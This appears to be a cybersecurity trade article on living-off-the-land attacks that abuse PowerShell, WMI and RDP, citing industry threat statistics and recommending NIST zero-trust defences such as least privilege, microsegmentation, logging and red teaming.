Your IT stack is the enemy: How 84% of attacks evade detection by turning trusted tools against you

In the early hours of a Sunday morning in Los Angeles, a leading financial services firm on the West Coast is under attack. A nation-state cyberattack squad has launched a living-off-the-land (LOTL) attack, targeting the firm’s pricing, trading, and valuation algorithms for cryptocurrency gain. Using common tools, the attackers have infiltrated the firm’s infrastructure and are slowly manipulating it for their own purposes.

According to CrowdStrike’s 2025 Global Threat Report, nearly 80% of modern attacks, including those in finance, are now malware-free. Attackers are exploiting valid credentials, remote monitoring tools, and administrative utilities with breakout times sometimes less than a minute. These tactics make it difficult for security teams to detect the ongoing attack.

The rise in credential theft, business email compromise, and zero-day vulnerabilities has created an ideal environment for LOTL attacks to thrive. Bitdefender’s recent research shows that 84% of modern attacks use LOTL techniques to bypass traditional detection systems. Attackers are exfiltrating sensitive data within the first hour of compromise in nearly 1 in 5 cases.

LOTL-based tactics have become the primary method for cyber intrusions, with advanced persistent threats (APTs) remaining undetected for weeks or months before data is stolen, as highlighted in IBM’s X-Force 2025 Threat Intelligence Index. The financial consequences of these attacks are significant, with the average cost of ransomware-related downtime reaching $1.7 million per incident.

Attackers are exploiting commonly used tools like PowerShell, Windows Management Instrumentation (WMI), and remote desktop protocol (RDP) to evade detection and persist inside enterprises. These tools leave no digital footprint, making it challenging for security teams to identify malicious activity.

Adversaries using LOTL techniques are patient and blend into the background, using administrative and remote management tools that security teams rely on. Instead of using malware and attention-grabbing exploits, attackers are logging in with existing credentials and tools, making it difficult to distinguish their activity from legitimate operations.

Defenders must take ownership of their technology stack and adopt a zero-trust approach to security. Constant vigilance, understanding of their attack surface, and a focus on what is truly out of place in their environment are critical steps in combating LOTL attacks. It is essential for organizations to prioritize cybersecurity and make it a core value to protect against evolving cyber threats. The NIST Zero Trust Architecture (SP 800-207) serves as a comprehensive organizational backbone and playbook to effectively tackle Lateral Movement and Living off the Land (LOTL) attacks head-on. These types of attacks have become increasingly common and sophisticated, making it crucial for organizations to implement robust security measures to protect their networks and data.

Here are some key strategies that organizations can implement using the principles outlined in the NIST Zero Trust Architecture:

Limit privileges on all accounts and delete long-standing accounts for contractors that haven’t been used in years: By applying least-privilege access across all admin and user accounts, organizations can prevent attackers from escalating their privileges and gaining unauthorized access to sensitive data.

Enforce microsegmentation: Dividing the network into secure zones helps confine attackers, limit their movement within the network, and reduce the impact of any potential security breaches.

Harden tool access and audit who is using them: Organizations should restrict, monitor, and log the use of tools such as PowerShell and WMI to prevent malicious actors from exploiting them. Additionally, implementing code signing, constrained language modes, and limiting access to trusted personnel can help enhance security.

Adopt NIST zero trust principles: Continuous verification of identity, device hygiene, and access context is essential for implementing adaptive trust as the default mode of operation, as outlined in SP 800-207.

Centralize behavioral analytics and logging: Extended monitoring can help organizations detect and flag unusual activities before they escalate into full-blown security incidents.

Deploy adaptive detection: Organizations with existing platforms that can scale and provide adaptive detection capabilities at a minimal cost should consider leveraging EDR/XDR solutions to proactively hunt for suspicious patterns and activities.

Red team regularly: Conducting simulated attacks can help organizations test their defenses and identify potential vulnerabilities that malicious actors could exploit. This proactive approach can help organizations stay one step ahead of cyber threats.

Elevate security awareness: Training users and administrators on LOTL attack methods, social engineering tactics, and indicators of compromise is essential for building a strong security culture within the organization.

Update and inventory: Maintaining up-to-date application inventories, patching known vulnerabilities, and conducting regular security audits are critical for identifying and addressing potential security gaps.

In conclusion, organizations must adopt a proactive and comprehensive approach to cybersecurity to defend against the growing threat of LOTL attacks. By following the guidelines outlined in the NIST Zero Trust Architecture and implementing the strategies mentioned above, organizations can strengthen their security posture and protect their valuable assets from malicious actors.